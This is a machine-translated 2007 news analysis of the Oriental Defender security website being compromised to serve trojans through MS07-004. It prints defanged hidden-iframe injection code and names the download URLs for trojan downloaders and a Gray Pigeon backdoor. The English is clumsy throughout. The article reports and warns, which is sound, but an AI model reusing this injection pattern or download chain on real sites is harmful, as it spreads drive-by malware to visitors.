Oriental Defender was hanged horse safety website Security who's going to make sure

Source: Internet
Author: User
Keywords Security appearance IFRAMESRC
Editor's note: For security purposes, "HTTP" is replaced with "Hxxp" and "<>" is replaced with "[]". "Two days ago, a netizen reflects the well-known security site in the east once again be mounted Trojan horse, this is the second time the Oriental defender exposed a security risk." Recall that there was once an Oriental defender website (hxxp://www.i110.com) There is a malicious code reference event, if the user has not installed the Microsoft ms07-004 patch, and use IE browser access to the above page, you will be infected with Trojan virus. Technical Analysis: 1. Oriental Guardian website Code, contains a reference to a malicious Web page: [iframe src=hxxp://***.ch/ook.html width=0 Height=0][/iframe] as 1:498) this.width=498; ' OnMouseWheel = ' Javascript:return big (This) ' height=316 alt= ' src= '/files/uploadimg/20070309/155900203.jpg ' width= 551 border=0> Figure 12. This referenced malicious Web page contains code that exploits the ms07-004 vulnerability, allowing the system to automatically download hxxp://***.ch/ Xia.exe (TROJAN-DOWNLOADER.WIN32.AGENT.DDZ) to the local and run. 3.xia.exe is a trojan download, the Trojan copy itself to the%system32% directory, named Wdfmg1r32.exe, run after downloading the gray pigeon virus hxxp://***.li/2. EXE (BACKDOOR.WIN32.HUPIGON.CPB). 4.2.exe is the latest variant of the gray pigeon virus, using rootkit technology to write, hidden process. It replicates itself to the%system32% directory, named System32.exe, which releases the file to%windir%\svchost.exe, file size 381440 bytes, and creates the following services: Service Name: Net work Nois Service Description: Net work Nois Service program: C:\WINNT\svchost.exe also downloads hxxp://lxn2wyf8899.3322.org/ip.txt to the Local system temp directory. Ip.txt contains the following: hxxp://221.215.170.192:5600/wwwroot/(the IP address is: MountainDong Province Qingdao (Lichang District) netcom ADSL) Infected computer will be hackers remote Full control, these operations may be arbitrary file operations, registry operations, keyboard records, download the implementation of Remote programs, arbitrary network operation or even remote boot camera monitoring. Be hung again by the horse and this time, on the East Guardian homepage, by looking at the page source code, you can see the page is inserted in a "[iframe src=" instruction, which will be hidden open a new page, this page forged the browser can not open the wrong page, and in the background hidden open three pages, Trojan download. Open hidden page code: [iframe src=hxxp://www.****.cn/33/reflector/index.htm width=0 height=0 Frameborder=0][/iframe] There are three web pages open in the Open forgery error page: [iframe src= "hxxp://www.****.cn/33/reflector/4.htm" width= "0" height= "0" frameborder= "0"][/ Iframe][iframe src= "hxxp://www.****.cn/33/reflector/2.htm" width= "0" height= "0" frameborder= "0"][/iframe][iframe Src= "hxxp://www.*****.com/wm/20/5.htm" width= "0" height= "0" frameborder= "0"][/iframe] Download Trojan: hxxp://www.****.cn/33/ Reflector/1.exe (invalid) hxxp://www.*****.com/0.exe498) this.width=498 ' OnMouseWheel = ' javascript:return big (This) ' height=333 alt= "" src= "/files/uploadimg/20070309/155927359.gif" width=490 border=0>) 2498; ' OnMouseWheel = ' Javascript:return big (This) ' height=336 alt= ' src= '/files/uploadimg/20070309/155938359.gif ' width= 491 border=0> Figure 3.Two, whether it will The San we often say "again and again two, not The San." As a safety pioneer of the security website, its users in the eyes of the credibility, the degree of impact are extremely high, and any one of their negligence caused by the harm is far greater than the Trojan virus itself caused by the damage. The first time the site was mounted on the Trojan event, I believe the Oriental defender should have taken the corresponding measures. But the horse-hanging incident can happen again, which needs to arouse our vigilance and reflection. Hanging the horse again, the description in the "spear" and "shield" in the struggle, "spear" once again occupy the upper hand. At the same time, the Oriental Guardian site one and then be hanged horse, in addition to the system itself is still not found in the loopholes, its own web site security monitoring should also have a certain, can be exploited defects. In previous articles we mentioned that CNN had been hit by a "worm that could have been detected in time" because it failed to update its antivirus software in time. "Spear" and "shield" are always co-exist, it is impossible to have a completely overshadowed another situation, can only be or both coexist, or both disappeared. In other words, two times the emergence of horse, in addition to the emergence of a new "spear", but also because the "shield" on the top of a loophole, gave the "spear" to exploit. Mistakes, the problem is not scary, fear is not know how the problem arises, the fear is that we do not know how to prevent, to avoid the problem of reappear. Security website It represents not only a company, a group, it is the forefront of cyber security struggle. When it can not guarantee its own security, but also let ordinary users to face the increasingly dangerous network world, but also let ordinary users to know how to help him in addition to the invasion of network threats. When the security website is knocked down, who can we trust! Security website Security who's going to make sure? Related Data ms07-004 Vulnerability: Multiple versions of Microsoft operating system support for Vector Markup Language (VML) there is an integer overflow that can allow a remote attacker to exploit this vulnerability to control the user's machine. Oriental Guardian: Chiao Tung University Information Security company, well-known information security companies, the company provides "Oriental Guardian" series Anti-Virus products, data protection, non-toxic Gateway products, anti-spam products, network equipment and system integration and OEM customized services. "Responsible editor: Snowflake TEL: (010) 68476606-8008" to force (0 Votes) Tempted (0 Votes) nonsense (0 Votes) Professional (0 Votes) The title of the party (0 Votes) passed (0 votes) by the original: Oriental Defender was hanged horse safety website security who to ensure return to the network security home

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.